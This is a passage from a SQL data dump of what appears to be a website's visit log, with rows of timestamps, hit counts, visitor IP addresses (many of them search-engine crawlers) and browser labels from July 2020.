6.249.70.70','chrome'),(524803,1595388957,2,2,0,0,'207.46.13.56','other'),(524804,1595389081,1,1,0,0,'66.249.70.69','chrome'),(524805,1595389390,1,1,0,0,'66.249.70.72','chrome'),(524806,1595389568,1,1,0,0,'91.196.178.21','chrome'),(524807,1595390660,1,1,0,0,'66.249.64.38','chrome'),(524808,1595391217,1,1,0,0,'8.29.198.27','other'),(524809,1595391221,1,1,0,0,'66.249.70.69','chrome'),(524810,1595391265,1,1,0,0,'157.55.39.223','other'),(524811,1595391274,1,1,0,0,'8.29.198.26','other'),(524812,1595391349,8,8,0,0,'185.11.82.228','other'),(524813,1595391517,1,1,0,0,'66.249.70.70','chrome'),(524814,1595392196,1,1,0,0,'131.220.6.152','chrome'),(524815,1595393365,1,1,0,0,'66.249.64.36','chrome'),(524816,1595393658,1,1,0,0,'62.205.134.182','other'),(524817,1595394191,1,1,0,0,'66.249.70.72','chrome'),(524818,1595394435,1,1,0,0,'66.249.70.70','chrome'),(524819,1595395199,3,3,0,0,'66.249.70.69','chrome'),(524820,1595395200,1,1,0,0,'54.36.149.13','other'),(524821,1595395969,3,3,0,0,'66.249.70.70','chrome'),(524822,1595396015,1,1,0,0,'66.249.70.72','chrome'),(524823,1595396029,1,1,0,0,'178.154.200.155','other'),(524824,1595396246,1,1,0,0,'66.249.64.33','chrome'),(524825,1595397444,1,1,0,0,'2.47.39.213','other'),(524826,1595397576,1,1,0,0,'91.196.178.89','chrome'),(524827,1595397729,1,1,0,0,'157.55.39.223','other'),(524828,1595397892,1,1,0,0,'66.249.70.69','chrome'),(524829,1595398011,1,1,0,0,'66.249.70.72','chrome'),(524830,1595398179,8,8,0,0,'185.11.82.228','other'),(524831,1595398259,1,1,0,0,'94.153.9.110','chrome'),(524832,1595398300,1,1,0,0,'66.249.64.33','chrome'),(524833,1595399460,1,1,0,0,'66.249.70.70','chrome'),(524834,1595399775,2,2,0,0,'66.249.70.69','chrome'),(524835,1595400179,1,1,0,0,'207.46.13.56','other'),(524836,1595400583,1,1,0,0,'178.154.200.216','other'),(524837,1595400875,1,1,0,0,'66.249.70.69','chrome'),(524838,1595401146,1,1,0,0,'5.45.207.100','other'),(524839,1595401148,1,1,0,0,'37.53.90.175','chrome'),(524840,1595401640,1,1,0,0,'78.154.165.111','firefox'),(524841,1595401899,1,1,0,0,'157.55.39.223','other'),(524842,1595402045,1,1,0,0,'8.29.198.27','other'),(524843,1595402096,1,1,0,0,'8.29.198.25','other'),(524844,1595402111,1,1,0,0,'91.196.178.170','chrome'),(524845,1595403253,2,2,0,0,'66.249.64.36','chrome'),(524846,1595403272,2,2,0,0,'66.249.70.72','chrome'),(524847,1595403744,1,1,0,0,'5.53.112.210','chrome'),(524848,1595404174,2,1,1,0,'66.249.70.70',''),(524849,1595405320,1,1,0,0,'66.249.70.70','chrome'),(524850,1595405992,1,1,0,0,'66.249.64.38','chrome'),(524851,1595406246,1,1,0,0,'178.154.200.175','other'),(524852,1595406578,2,2,0,0,'66.249.70.70','chrome'),(524853,1595406670,1,1,0,0,'66.249.70.72','chrome'),(524854,1595407737,1,1,0,0,'66.249.64.36','chrome'),(524855,1595407947,1,1,0,0,'176.111.33.18','firefox'),(524856,1595408001,4,4,0,0,'66.249.70.72','chrome'),(524857,1595408192,1,1,0,0,'66.249.70.70','chrome'),(524858,1595408260,8,8,0,0,'185.11.82.228','other'),(524859,1595408310,2,2,0,0,'66.249.64.38','chrome'),(524860,1595409878,1,1,0,0,'66.249.70.69','chrome'),(524861,1595409897,2,2,0,0,'66.249.70.70','chrome'),(524862,1595410088,1,1,0,0,'207.46.13.56','other'),(524863,1595410299,1,1,0,0,'66.249.70.72','chrome'),(524864,1595410990,2,2,0,0,'66.249.64.36','chrome'),(524865,1595411478,2,2,0,0,'66.249.70.72','chrome'),(524866,1595411670,1,1,0,0,'66.249.70.69','chrome'),(524867,1595411695,1,1,0,0,'66.249.70.70','chrome'),(524868,1595411978,2,2,0,0,'178.136.6.103','chrome'),(524869,1595412020,1,1,0,0,'31.13.127.8','other'),(524870,1595412022,1,1,0,0,'31.13.115.17','other'),(524871,1595412023,1,1,0,0,'31.13.127.2','other'),(524872,1595412032,1,1,0,0,'31.13.127.111','other'),(524873,1595412749,2,2,0,0,'66.249.64.33','chrome'),(524874,1595412877,1,1,0,0,'8.29.198.27','other'),(524875,1595412939,1,1,0,0,'8.29.198.25','other'),(524876,1595413059,1,1,0,0,'35.171.146.156','chrome'),(524877,1595413475,1,1,0,0,'178.136.6.103','chrome'),(524878,1595413539,1,1,0,0,'66.249.64.36','chrome'),(524879,1595413546,1,1,0,0,'66.249.70.70','chrome'),(524880,1595413565,2,2,0,0,'66.249.70.69','chrome'),(524881,1595414803,1,1,0,0,'66.249.64.44','chrome'),(524882,1595414856,1,1,0,0,'66.249.70.69','chrome'),(524883,1595414930,1,1,0,0,'91.196.178.21','chrome'),(524884,1595415159,1,1,0,0,'66.249.70.70','chrome'),(524885,1595415846,2,2,0,0,'66.249.70.72','chrome'),(524886,1595416148,5,5,0,0,'66.249.70.69','chrome'),(524887,1595416546,1,1,0,0,'66.249.64.33','chrome'),(524888,1595416562,2,2,0,0,'95.213.141.126','opera'),(524889,1595416650,1,1,0,0,'207.46.13.56','other'),(524890,1595416753,1,1,0,0,'109.74.154.72','chrome'),(524891,1595416957,2,2,0,0,'66.249.70.70','chrome'),(524892,1595417701,1,1,0,0,'66.249.64.38','chrome'),(524893,1595417780,1,1,0,0,'66.249.70.72','chrome'),(524894,1595417858,2,2,0,0,'66.249.64.46','chrome'),(524895,1595417920,1,1,0,0,'66.249.70.69','chrome'),(524896,1595417981,2,2,0,0,'66.249.70.70','chrome'),(524897,1595418786,2,2,0,0,'66.249.70.72','chrome'),(524898,1595418982,1,1,0,0,'91.196.178.142','chrome'),(524899,1595419016,1,1,0,0,'178.136.6.103','chrome'),(524900,1595419525,1,1,0,0,'66.249.64.36','chrome'),(524901,1595420637,1,1,0,0,'66.249.70.78','chrome'),(524902,1595420664,1,1,0,0,'157.55.39.223','other'),(524903,1595420673,1,1,0,0,'52.249.197.159','other'),(524904,1595420685,1,1,0,0,'66.249.70.70','chrome'),(524905,1595420787,1,1,0,0,'31.13.127.118','other'),(524906,1595420791,1,1,0,0,'31.13.127.21','other'),(524907,1595420872,8,8,0,0,'185.11.82.228','other'),(524908,1595421132,4,4,0,0,'66.249.70.69','chrome'),(524909,1595421525,1,1,0,0,'46.4.33.48','other'),(524910,1595421831,1,1,0,0,'66.249.70.70','chrome'),(524911,1595422072,1,1,0,0,'66.249.70.72','chrome'),(524912,1595422207,2,2,0,0,'157.55.39.174','other'),(524913,1595422387,1,1,0,0,'66.249.70.78','chrome'),(524914,1595423720,2,2,0,0,'8.29.198.27','other'),(524915,1595424206,1,1,0,0,'66.249.70.70','chrome'),(524916,1595424277,3,3,0,0,'66.249.64.36','chrome'),(524917,1595424340,1,1,0,0,'40.77.189.52','other'),(524918,1595424443,5,5,0,0,'66.249.70.69','chrome'),(524919,1595424880,2,2,0,0,'66.249.70.72','chrome'),(524920,1595425130,1,1,0,0,'157.55.39.223','other'),(524921,1595425642,1,1,0,0,'91.196.122.158','chrome'),(524922,1595426355,3,3,0,0,'66.249.70.69','chrome'),(524923,1595426587,3,3,0,0,'66.249.70.72','chrome'),(524924,1595426596,4,4,0,0,'66.249.70.70','chrome'),(524925,1595426840,1,1,0,0,'157.55.39.223','other'),(524926,1595427829,1,1,0,0,'66.249.64.36','chrome'),(524927,1595427930,1,1,0,0,'66.249.70.70','chrome'),(524928,1595428153,1,1,0,0,'66.249.70.72','chrome'),(524929,1595428225,1,1,0,0,'88.155.78.62','chrome'),(524930,1595428353,1,1,0,0,'93.73.53.42','chrome'),(524931,1595428862,3,3,0,0,'66.249.70.70','chrome'),(524932,1595428971,2,2,0,0,'66.249.70.69','chrome'),(524933,1595429448,1,1,0,0,'66.249.70.72','chrome'),(524934,1595429490,1,1,0,0,'157.55.39.174','other'),(524935,1595430476,3,3,0,0,'66.249.70.70','chrome'),(524936,1595430761,2,2,0,0,'66.249.70.72','chrome'),(524937,1595430774,1,1,0,0,'66.249.70.69','chrome'),(524938,1595432079,2,2,0,0,'157.55.39.174','other'),(524939,1595432184,1,1,0,0,'178.154.200.222','other'),(524940,1595432186,1,1,0,0,'213.180.203.16','other'),(524941,1595432217,1,1,0,0,'66.249.70.69','chrome'),(524942,1595432235,3,3,0,0,'66.249.70.70','chrome'),(524943,1595432327,1,1,0,0,'66.249.70.72','chrome'),(524944,1595432804,8,8,0,0,'185.11.82.228','other'),(524945,1595433259,2,2,0,0,'66.249.70.69','chrome'),(524946,1595433644,2,2,0,0,'66.249.70.72','chrome'),(524947,1595433714,1,1,0,0,'66.249.64.38','chrome'),(524948,1595433819,3,3,0,0,'66.249.70.70','chrome'),(524949,1595434201,8,8,0,0,'185.11.82.228','other'),(524950,1595434555,1,1,0,0,'8.29.198.27','other'),(524951,1595434599,1,1,0,0,'8.29.198.26','other'),(524952,1595435209,1,1,0,0,'178.154.200.222','other'),(524953,1595435585,8,8,0,0,'185.11.82.228','other'),(524954,1595435801,1,1,0,0,'66.249.70.72','chrome'),(524955,1595435836,3,3,0,0,'66.249.70.69','chrome'),(524956,1595437045,8,8,0,0,'185.11.82.228','other'),(524957,1595437354,1,1,0,0,'66.249.64.36','chrome'),(524958,1595437419,1,1,0,0,'66.249.70.72','chrome'),(524959,1595437634,1,1,0,0,'66.249.70.69','chrome'),(524960,1595438150,2,2,0,0,'66.249.70.70','chrome'),(524961,1595438529,8,8,0,0,'185.11.82.228','other'),(524962,1595439248,3,3,0,0,'66.249.70.70','chrome'),(524963,1595439327,2,2,0,0,'66.249.70.69','chrome'),(524964,1595439356,3,3,0,0,'157.55.39.223','other'),(524965,1595439620,1,1,0,0,'91.196.178.21','chrome'),(524966,1595439712,1,1,0,0,'66.249.64.38','chrome'),(524967,1595439996,1,1,0,0,'178.133.156.109','chrome'),(524968,1595440028,8,8,0,0,'185.11.82.228','other'),(524969,1595440779,2,2,0,0,'66.249.70.72','chrome'),(524970,1595440854,1,1,0,0,'66.249.64.33','chrome'),(524971,1595440924,4,4,0,0,'66.249.70.69','chrome'),(524972,1595441466,2,2,0,0,'66.249.70.70','chrome'),(524973,1595441576,8,8,0,0,'185.11.82.228','other'),(524974,1595441619,1,1,0,0,'213.180.203.16','other'),(524975,1595442717,1,1,0,0,'66.249.64.38','chrome'),(524976,1595442845,2,2,0,0,'66.249.70.69','chrome'),(524977,1595442892,1,1,0,0,'209.17.96.66','other'),(524978,1595442980,3,3,0,0,'66.249.70.70','chrome'),(524979,1595443090,1,1,0,0,'66.249.70.72','chrome'),(524980,1595443126,8,8,0,0,'185.11.82.228','other'),(524981,1595443510,2,2,0,0,'66.249.64.36','chrome'),(524982,1595443653,1,1,0,0,'91.196.178.175','chrome'),(524983,1595443675,1,1,0,0,'34.72.2.254','chrome'),(524984,1595443817,1,1,0,0,'157.55.39.223','other'),(524985,1595444225,2,2,0,0,'66.249.70.70','chrome'),(524986,1595444296,1,1,0,0,'178.154.200.222','other'),(524987,1595444608,5,5,0,0,'66.249.70.72','chrome'),(524988,1595445038,8,8,0,0,'185.11.82.228','other'),(524989,1595445058,3,3,0,0,'66.249.64.33','chrome'),(524990,1595445277,2,2,0,0,'66.249.70.70','chrome'),(524991,1595445386,2,2,0,0,'8.29.198.26','other'),(524992,1595445417,3,3,0,0,'66.249.70.69','chrome'),(524993,1595445556,2,2,0,0,'157.55.39.223','other'),(524994,1595446358,1,1,0,0,'178.154.200.222','other'),(524995,1595446992,2,2,0,0,'66.249.70.70','chrome'),(524996,1595447400,8,8,0,0,'185.11.82.228','other'),(524997,1595447504,1,1,0,0,'66.249.70.72','chrome'),(524998,1595448183,3,3,0,0,'66.249.70.69','chrome'),(524999,1595448314,1,1,0,0,'49.12.126.16','chrome'),(525000,1595448325,1,1,0,0,'37.73.134.217','chrome'),(525001,1595448428,2,2,0,0,'66.249.70.72','chrome'),(525002,1595448449,1,1,0,0,'66.249.64.36','chrome'),(525003,1595449230,1,1,0,0,'49.0.2.26','chrome'),(525004,1595449524,2,2,0,0,'157.55.39.193','other'),(525005,1595449656,2,2,0,0,'66.249.70.72','chrome'),(525006,1595449853,2,2,0,0,'66.249.70.69','chrome'),(525007,1595450050,2,1,1,0,'66.249.70.70',''),(525008,1595450528,1,1,0,0,'178.154.200.222','other'),(525009,1595450622,8,8,0,0,'185.11.82.228','other'),(525010,1595450787,1,1,0,0,'89.46.105.248','chrome'),(525011,1595450788,2,2,0,0,'27.124.5.49','chrome'),(525012,1595450820,1,1,0,0,'66.249.64.36','chrome'),(525013,1595450847,2,2,0,0,'51.68.11.207','chrome'),(525014,1595451039,2,2,0,0,'66.249.70.72','chrome'),(525015,1595451048,1,1,0,0,'87.236.20.169','chrome'),(525016,1595451145,2,2,0,0,'103.14.113.189','chrome'),(525017,1595451770,1,1,0,0,'66.249.70.69','chrome'),(525018,1595451954,1,1,0,0,'66.249.70.72','chrome'),(525019,1595452507,1,1,0,0,'88.99.172.137','chrome'),(525020,1595452518,1,1,0,0,'66.249.70.70','chrome'),(525021,1595453423,1,1,0,0,'40.81.210.27','chrome'),(525022,1595453568,1,1,0,0,'66.249.70.69','chrome'),(525023,1595453577,2,2,0,0,'66.249.70.70','chrome'),(525024,1595454021,8,8,0,0,'185.11.82.228','other'),(525025,1595454198,2,2,0,0,'94.247.176.153','chrome'),(525026,1595454494,1,1,0,0,'157.55.39.174','other'),(525027,1595455270,4,4,0,0,'66.249.70.70','chrome'),(525028,1595455589,1,1,0,0,'66.249.70.72','chrome'),(525029,1595455664,1,1,0,0,'66.249.70.69','chrome'),(525030,1595455722,1,1,0,0,'31.177.95.172','chrome'),(525031,1595455813,1,1,0,0,'66.249.64.33','chrome'),(525032,1595456218,1,1,0,0,'8.29.198.27','other'),(525033,1595456265,1,1,0,0,'8.29.198.26','other'),(525034,1595456609,4,4,0,0,'66.249.70.69','chrome'),(525035,1595456811,4,4,0,0,'66.249.70.70','chrome'),(525036,1595457090,2,2,0,0,'66.249.64.33','chrome'),(525037,1595457147,1,1,0,0,'66.249.70.72','chrome'),(525038,1595457702,1,1,0,0,'66.249.64.36','chrome'),(525039,1595458009,1,1,0,0,'66.249.70.69','chrome'),(525040,1595458061,1,1,0,0,'66.249.70.70','chrome'),(525041,1595458179,8,8,0,0,'185.11.82.228','other'),(525042,1595459167,1,1,0,0,'157.55.39.203','other'),(525043,1595459457,2,2,0,0,'66.249.64.33','chrome'),(525044,1595459483,1,1,0,0,'66.249.70.70','chrome'),(525045,1595459606,2,2,0,0,'66.249.64.38','chrome'),(525046,1595460228,2,2,0,0,'91.208.99.2','chrome'),(525047,1595460308,1,1,0,0,'178.210.68.22','chrome'),(525048,1595460412,1,1,0,0,'157.55.39.203','other'),(525049,1595460600,3,3,0,0,'66.249.70.70','chrome'),(525050,1595460819,1,1,0,0,'178.154.200.220','other'),(525051,1595461086,2,2,0,0,'66.249.70.69','chrome'),(525052,1595461172,1,1,0,0,'66.249.64.33','chrome'),(525053,1595461347,1,1,0,0,'66.249.64.38','chrome'),(525054,1595461413,1,1,0,0,'66.249.64.36','chrome'),(525055,1595462054,1,1,0,0,'186.234.80.175','chrome'),(525056,1595462108,1,1,0,0,'62.205.134.182','other'),(525057,1595462773,2,2,0,0,'66.249.70.70','chrome'),(525058,1595463250,2,2,0,0,'66.249.70.72','chrome'),(525059,1595463342,1,1,0,0,'66.249.64.33','chrome'),(525060,1595463357,1,1,0,0,'157.55.39.174','other'),(525061,1595464480,1,1,0,0,'66.249.70.72','chrome'),(525062,1595464624,1,1,0,0,'66.249.70.69','chrome'),(525063,1595464935,1,1,0,0,'66.249.64.36','chrome'),(525064,1595465011,1,1,0,0,'103.18.6.177','chrome'),(525065,1595465237,1,1,0,0,'93.125.99.83','chrome'),(525066,1595466615,2,2,0,0,'66.249.70.70','chrome'),(525067,1595466995,4,4,0,0,'66.249.70.69','chrome'),(525068,1595467044,2,2,0,0,'8.29.198.27','other'),(525069,1595467217,2,2,0,0,'50.28.40.153','chrome'),(525070,1595467518,1,1,0,0,'217.171.147.164','chrome'),(525071,1595467960,8,8,0,0,'185.11.82.228','other'),(525072,1595468201,1,1,0,0,'157.55.39.174','other'),(525073,1595468426,1,1,0,0,'66.249.70.70','chrome'),(525074,1595468513,1,1,0,0,'66.249.70.72','chrome'),(525075,1595468931,1,1,0,0,'193.106.30.99','firefox'),(525076,1595469134,1,1,0,0,'157.55.39.174','other'),(525077,1595469918,4,4,0,0,'66.249.70.69','chrome'),(525078,1595469988,3,3,0,0,'66.249.70.72','chrome'),(525079,1595470253,1,1,0,0,'66.249.64.33','chrome'),(525080,1595470653,1,1,0,0,'66.249.64.38','chrome'),(525081,1595472946,2,2,0,0,'66.249.70.72','chrome'),(525082,1595473046,1,1,0,0,'66.249.64.36','chrome'),(525083,1595473160,1,1,0,0,'66.249.70.70','chrome'),(525084,1595473564,1,1,0,0,'157.55.39.174','other'),(525085,1595474070,8,8,0,0,'185.11.82.228','other'),(525086,1595474616,1,1,0,0,'157.55.39.203','other'),(525087,1595475017,1,1,0,0,'157.55.39.174','other'),(525088,1595475265,8,8,0,0,'185.11.82.228','other'),(525089,1595475317,1,1,0,0,'66.249.70.70','chrome'),(525090,1595475395,1,1,0,0,'66.249.64.33','chrome'),(525091,1595475855,1,1,0,0,'66.249.70.72','chrome'),(525092,1595475971,1,1,0,0,'95.27.5.143','chrome'),(525093,1595476170,1,1,0,0,'31.13.115.10','other'),(525094,1595476243,1,1,0,0,'157.55.39.203','other'),(525095,1595476507,8,8,0,0,'185.11.82.228','other'),(525096,1595476765,2,2,0,0,'66.249.70.70','chrome'),(525097,1595476909,1,1,0,0,'66.249.70.69','chrome'),(525098,1595477764,8,8,0,0,'185.11.82.228','other'),(525099,1595477875,1,1,0,0,'8.29.198.26','other'),(525100,1595477933,1,1,0,0,'8.29.198.27','other'),(525101,1595478541,1,1,0,0,'178.154.200.222','other'),(525102,1595478931,1,1,0,0,'66.249.70.72','chrome'),(525103,1595478990,8,8,0,0,'185.11.82.228','other'),(525104,1595479130,1,1,0,0,'3.90.83.73','chrome'),(525105,1595479317,1,1,0,0,'157.55.39.203','other'),(525106,1595479468,1,1,0,0,'131.220.6.152','chrome'),(525107,1595479824,1,1,0,0,'62.205.134.182','other'),(525108,1595480238,1,1,0,0,'178.154.200.222','other'),(525109,1595480249,8,8,0,0,'185.11.82.228','other'),(525110,1595480510,2,2,0,0,'66.249.70.70','chrome'),(525111,1595481154,1,1,0,0,'69.163.201.46','chrome'),(525112,1595481525,8,8,0,0,'185.11.82.228','other'),(525113,1595482046,2,2,0,0,'66.249.64.33','chrome'),(525114,1595482549,1,1,0,0,'66.249.70.72','chrome'),(525115,1595482623,4,4,0,0,'66.249.70.69','chrome'),(525116,1595482698,2,2,0,0,'66.249.70.70','chrome'),(525117,1595482703,8,8,0,0,'185.11.82.228','other'),(525118,1595482835,1,1,0,0,'91.196.178.89','chrome'),(525119,1595482997,2,2,0,0,'39.105.52.218','chrome'),(525120,1595483239,1,1,0,0,'91.196.178.75','firefox'),(525121,1595483485,1,1,0,0,'66.249.64.38','chrome'),(525122,1595483919,8,8,0,0,'185.11.82.228','other'),(525123,1595484500,1,1,0,0,'178.154.200.222','other'),(525124,1595484696,1,1,0,0,'91.134.248.253','chrome'),(525125,1595485179,8,8,0,0,'185.11.82.228','other'),(525126,1595485498,1,1,0,0,'91.196.178.89','chrome'),(525127,1595486164,1,1,0,0,'157.55.39.174','other'),(525128,1595486347,1,1,0,0,'66.249.70.70','chrome'),(525129,1595486428,8,8,0,0,'185.11.82.228','other'),(525130,1595486454,1,1,0,0,'69.167.175.221','chrome'),(525131,1595486765,1,1,0,0,'37.73.170.164','chrome'),(525132,1595486967,1,1,0,0,'91.196.178.89','chrome'),(525133,1595487814,8,8,0,0,'185.11.82.228','other'),(525134,1595488592,1,1,0,0,'178.95.156.86','chrome'),(525135,1595488725,1,1,0,0,'8.29.198.27','other'),(525136,1595488766,1,1,0,0,'8.29.198.26','other'),(525137,1595489103,1,1,0,0,'66.249.64.38','chrome'),(525138,1595489111,1,1,0,0,'66.249.64.36','chrome'),(525139,1595489151,1,1,0,0,'66.249.64.33','chrome'),(525140,1595489234,1,0,1,0,'66.249.70.72',''),(525141,1595489240,8,8,0,0,'185.11.82.228','other'),(525142,1595489251,1,1,0,0,'66.249.70.70','chrome'),(525143,1595489473,1,1,0,0,'178.136.6.103','chrome'),(525144,1595489597,1,1,0,0,'178.95.156.86','chrome'),(525145,1595489938,2,2,0,0,'66.249.70.72','chrome'),(525146,1595490643,1,1,0,0,'66.249.70.69','chrome'),(525147,1595490664,8,8,0,0,'185.11.82.228','other'),(525148,1595491207,1,1,0,0,'66.249.70.70','chrome'),(525149,1595491697,1,1,0,0,'157.55.39.203','other'),(525150,1595492125,8,8,0,0,'185.11.82.228','other'),(525151,1595492144,1,1,0,0,'40.117.209.114','chrome'),(525152,1595492146,1,1,0,0,'17.58.99.84','other'),(525153,1595492647,2,2,0,0,'66.249.70.72','chrome'),(525154,1595492822,2,2,0,0,'66.249.70.69','chrome'),(525155,1595493698,8,8,0,0,'185.11.82.228','other'),(525156,1595493837,1,1,0,0,'66.249.64.38','chrome'),(525157,1595493880,1,1,0,0,'31.41.71.227','chrome'),(525158,1595494130,7,7,0,0,'66.249.70.70','chrome'),(525159,1595494252,2,2,0,0,'66.249.70.72','chrome'),(525160,1595494414,3,3,0,0,'66.249.70.69','chrome'),(525161,1595495219,2,2,0,0,'66.249.70.72','chrome'),(525162,1595495320,2,2,0,0,'66.249.70.70','chrome'),(525163,1595495373,8,8,0,0,'185.11.82.228','other'),(525164,1595495653,3,3,0,0,'66.249.70.69','chrome'),(525165,1595496176,2,2,0,0,'51.68.11.227','chrome'),(525166,1595496271,2,2,0,0,'91.208.99.2','chrome'),(525167,1595496716,3,3,0,0,'66.249.70.70','chrome'),(525168,1595496794,1,1,0,0,'66.249.64.38','chrome'),(525169,1595497098,8,8,0,0,'185.11.82.228','other'),(525170,1595497366,1,1,0,0,'91.196.178.89','chrome'),(525171,1595497451,3,3,0,0,'66.249.70.69','chrome'),(525172,1595497468,1,1,0,0,'3.236.116.204','chrome'),(525173,1595498322,1,1,0,0,'178.154.200.222','other'),(525174,1595498496,3,3,0,0,'66.249.70.69','chrome'),(525175,1595498553,1,1,0,0,'66.249.70.70','chrome'),(525176,1595498600,1,1,0,0,'34.219.223.77','chrome'),(525177,1595498662,3,3,0,0,'66.249.70.72','chrome'),(525178,1595498729,8,8,0,0,'185.11.82.228','other'),(525179,1595499407,2,2,0,0,'51.68.11.215','chrome'),(525180,1595500411,8,8,0,0,'185.11.82.228','other'),(525181,1595500439,1,1,0,0,'66.249.70.69','chrome'),(525182,1595500475,1,1,0,0,'178.154.200.196','other'),(525183,1595500598,1,1,0,0,'8.29.198.25','other'),(525184,1595501139,1,1,0,0,'149.202.196.101','chrome'),(525185,1595501217,1,1,0,0,'66.249.70.70','chrome'),(525186,1595501420,1,1,0,0,'8.29.198.27','other'),(525187,1595501432,2,2,0,0,'185.214.165.113','firefox'),(525188,1595501795,6,6,0,0,'66.249.70.69','chrome'),(525189,1595501944,1,1,0,0,'66.249.70.72','chrome'),(525190,1595502128,8,8,0,0,'185.11.82.228','other'),(525191,1595502145,1,1,0,0,'66.249.64.42','chrome'),(525192,1595502163,1,1,0,0,'109.74.154.72','chrome'),(525193,1595502448,2,2,0,0,'51.68.11.211','chrome'),(525194,1595502858,1,1,0,0,'66.249.70.70','chrome'),(525195,1595502968,1,1,0,0,'176.193.243.44','chrome'),(525196,1595503708,1,1,0,0,'178.154.200.222','other'),(525197,1595503852,2,2,0,0,'66.249.70.69','chrome'),(525198,1595503979,3,3,0,0,'66.249.70.70','chrome'),(525199,1595504010,8,8,0,0,'185.11.82.228','other'),(525200,1595504083,1,1,0,0,'66.249.70.72','chrome'),(525201,1595504264,1,1,0,0,'93.89.225.134','chrome'),(525202,1595504797,1,1,0,0,'66.249.64.46','chrome'),(525203,1595504983,1,1,0,0,'31.177.95.66','chrome'),(525204,1595505656,2,2,0,0,'198.38.84.223','chrome'),(525205,1595505680,1,1,0,0,'66.249.70.69','chrome'),(525206,1595505694,2,2,0,0,'89.46.105.229','chrome'),(525207,1595505745,1,1,0,0,'149.202.196.101','chrome'),(525208,1595505803,1,1,0,0,'91.196.178.89','chrome'),(525209,1595505819,1,1,0,0,'207.180.255.84','chrome'),(525210,1595505820,2,2,0,0,'66.249.64.33','chrome'),(525211,1595505824,1,1,0,0,'66.249.70.70','chrome'),(525212,1595505876,8,8,0,0,'185.11.82.228','other'),(525213,1595506166,2,2,0,0,'66.249.70.72','chrome'),(525214,1595506822,1,1,0,0,'91.196.178.151','chrome'),(525215,1595506984,1,1,0,0,'176.111.33.18','firefox'),(525216,1595507158,1,1,0,0,'94.153.5.236','chrome'),(525217,1595507220,1,1,0,0,'66.249.70.69','chrome'),(525218,1595507397,2,2,0,0,'157.55.39.174','other'),(525219,1595507617,1,1,0,0,'5.61.250.112','chrome'),(525220,1595507787,8,8,0,0,'185.11.82.228','other'),(525221,1595508252,1,1,0,0,'176.111.33.18','firefox'),(525222,1595508305,1,1,0,0,'66.249.70.72','chrome'),(525223,1595508349,1,1,0,0,'66.249.70.70','chrome'),(525224,1595508648,1,1,0,0,'157.55.39.174','other'),(525225,1595509298,1,1,0,0,'66.249.70.72','chrome'),(525226,1595509379,1,1,0,0,'46.164.128.138','chrome'),(525227,1595509746,8,8,0,0,'185.11.82.228','other'),(525228,1595511624,8,8,0,0,'185.11.82.228','other'),(525229,1595511633,1,1,0,0,'8.29.198.26','other'),(525230,1595511709,2,2,0,0,'66.249.70.70','chrome'),(525231,1595512566,1,1,0,0,'95.132.133.162','chrome'),(525232,1595512571,1,1,0,0,'157.55.39.174','other'),(525233,1595512617,1,1,0,0,'8.29.198.26','other'),(525234,1595513536,8,8,0,0,'185.11.82.228','other'),(525235,1595513541,1,1,0,0,'66.249.66.128','chrome'),(525236,1595515452,8,8,0,0,'185.11.82.228','other'),(525237,1595515931,1,1,0,0,'3.90.83.73','chrome'),(525238,1595516071,1,1,0,0,'66.249.70.69','chrome'),(525239,1595516767,2,2,0,0,'176.59.214.117','chrome'),(525240,1595517034,1,1,0,0,'91.196.178.94','chrome'),(525241,1595517038,1,1,0,0,'66.249.70.69','chrome'),(525242,1595517301,8,8,0,0,'185.11.82.228','other'),(525243,1595519185,8,8,0,0,'185.11.82.228','other'),(525244,1595519723,1,1,0,0,'157.55.39.174','other'),(525245,1595520503,2,2,0,0,'93.188.2.5','chrome'),(525246,1595520836,1,1,0,0,'31.13.127.8','other'),(525247,1595521091,8,8,0,0,'185.11.82.228','other'),(525248,1595521317,1,1,0,0,'66.249.64.33','chrome'),(525249,1595522338,1,1,0,0,'178.250.54.207','chrome'),(525250,1595522434,1,1,0,0,'66.249.70.69','chrome'),(525251,1595522469,1,1,0,0,'8.29.198.27','other'),(525252,1595522722,1,1,0,0,'209.126.102.148','chrome'),(525253,1595522861,1,1,0,0,'66.249.70.70','chrome'),(525254,1595522914,1,0,1,0,'66.249.70.72',''),(525255,1595523058,8,8,0,0,'185.11.82.228','other'),(525256,1595523189,3,3,0,0,'66.249.70.72','chrome'),(525257,1595523453,1,1,0,0,'8.29.198.26','other'),(525258,1595524060,2,2,0,0,'157.55.39.208','other'),(525259,1595524555,1,1,0,0,'66.249.70.72','chrome'),(525260,1595525310,8,8,0,0,'185.11.82.228','other'),(525261,1595525502,1,1,0,0,'192.188.46.4','chrome'),(525262,1595526528,1,1,0,0,'91.209.11.236','other'),(525263,1595526774,1,1,0,0,'173.236.243.26','chrome'),(525264,1595527097,2,2,0,0,'66.249.70.70','chrome'),(525265,1595527242,1,1,0,0,'51.68.11.215','chrome'),(525266,1595527574,2,2,0,0,'103.31.232.173','chrome'),(525267,1595527724,8,8,0,0,'185.11.82.228','other'),(525268,1595528064,1,1,0,0,'213.180.203.109','other'),(525269,1595528068,1,1,0,0,'178.154.200.155','other'),(525270,1595528593,2,2,0,0,'66.249.70.69','chrome'),(525271,1595528616,1,1,0,0,'157.55.39.174','other'),(525272,1595528718,1,1,0,0,'149.202.196.101','chrome'),(525273,1595528763,2,2,0,0,'66.249.70.70','chrome'),(525274,1595529162,1,1,0,0,'66.249.64.33','chrome'),(525275,1595529315,8,8,0,0,'185.11.82.228','other'),(525276,1595529627,1,1,0,0,'157.55.39.208','other'),(525277,1595530195,1,1,0,0,'81.88.49.9','chrome'),(525278,1595530200,1,1,0,0,'157.55.39.174','other'),(525280,1595530221,1,1,0,0,'37.17.224.121','chrome'),(525281,1595530530,8,8,0,0,'185.11.82.228','other'),(525282,1595531152,2,2,0,0,'157.55.39.208','other'),(525283,1595531157,1,1,0,0,'66.249.70.69','chrome'),(525284,1595531647,2,2,0,0,'51.68.11.203','chrome'),(525285,1595531772,8,8,0,0,'185.11.82.228','other'),(525286,1595532337,1,1,0,0,'66.249.70.70','chrome'),(525287,1595532469,2,2,0,0,'66.249.64.38','chrome'),(525288,1595532697,1,1,0,0,'157.55.39.94','other'),(525289,1595533058,8,8,0,0,'185.11.82.228','other'),(525290,1595533302,1,1,0,0,'8.29.198.27','other'),(525291,1595534076,1,1,0,0,'66.147.244.155','chrome'),(525292,1595534283,1,1,0,0,'8.29.198.25','other'),(525293,1595534313,8,8,0,0,'185.11.82.228','other'),(525294,1595534319,1,1,0,0,'157.55.39.174','other'),(525295,1595534370,1,1,0,0,'157.55.39.208','other'),(525296,1595534952,1,1,0,0,'66.102.9.169','chrome'),(525297,1595534976,1,1,0,0,'66.249.70.72','chrome'),(525298,1595535260,1,1